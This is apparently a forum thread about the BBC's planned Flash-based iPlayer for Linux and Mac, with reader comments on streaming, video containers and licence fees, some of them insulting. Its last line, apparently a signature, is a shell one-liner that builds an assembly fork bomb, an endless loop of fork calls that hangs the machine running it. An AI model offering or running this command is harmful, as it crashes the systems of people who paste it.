BBC Quietly Announces Linux/Mac iPlayer
Keir Thomas writes "When the BBC released its new iPlayer watch-on-demand service, there were many complaints about the fact it was Windows-only — the equivalent of current BBC broadcasts only being watchable on, say, a Sony television. The good news is that the BBC has announced a Flash-based player for Linux and Mac due by the end of the year. (The announcement is buried half way down the page.) The bad news is that it will probably only offer streaming, and not the ability to download programs, like the Windows client has. Quote: 'It comes down to cost per person and reach at the end of the day.'"
>Can they get their license fee lower?
No but they can use any of the other dozens of services on offer and stop whining like a little girl.
I want a list of atrocities done in your name - Recoil
OH YES YOU CAN, stop thinking that video is .avi you moron. It all depends on the video container. Some allow playing right from the start (mpg). In fact if you got a non-crap video player EVERY video can be played without it being complete, the only thing that doesn't work in forinstance avi is skipping forward.
I used to use this plenty of times back when I had a backbone for an internet connection, streaming avi from FTP, oh yeah, life was good back then.
Oh and if windows still refuses to open a file you are downloading, get a proper OS.
With bittorrents MPG's can even be viewed if have just one large enough segment.
Video can't be viewed before they are fully downloaded, geez, new much?
MMO Quests are like orgasms:
You may solo them, I prefer them in a group.
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;